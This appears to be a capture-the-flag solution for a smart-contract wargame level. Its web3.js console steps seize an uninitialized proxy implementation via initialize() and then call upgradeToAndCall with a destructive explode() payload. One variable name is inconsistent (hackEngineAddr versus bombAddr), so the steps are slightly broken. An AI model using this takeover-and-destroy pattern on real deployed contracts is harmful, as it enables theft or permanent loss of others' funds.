# Command: <br />
1. implAddr = await web3.eth.getStorageAt(contract.address, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc') <br />
2. implAddr = '0x' + implAddr.slice(-40) <br />
3. initializeData = web3.eth.abi.encodeFunctionSignature("initialize()") <br />
4. await web3.eth.sendTransaction({ from: player, to: implAddr, data: initializeData }) <br />
5. hackEngineAddr = '<Địa chỉ của HackEngine contract khi được deploy  >' <br />
6. explodeData = web3.eth.abi.encodeFunctionSignature("explode()") <br />
7. upgradeSignature = {
    name: 'upgradeToAndCall',
    type: 'function',
    inputs: [
        {
            type: 'address',
            name: 'newImplementation'
        },
        {
            type: 'bytes',
            name: 'data'
        }
    ]
} <br />
8. upgradeParams = [bombAddr, explodeData] <br />
9. upgradeData = web3.eth.abi.encodeFunctionCall(upgradeSignature, upgradeParams) <br />
10. await web3.eth.sendTransaction({from: player, to: implAddr, data: upgradeData})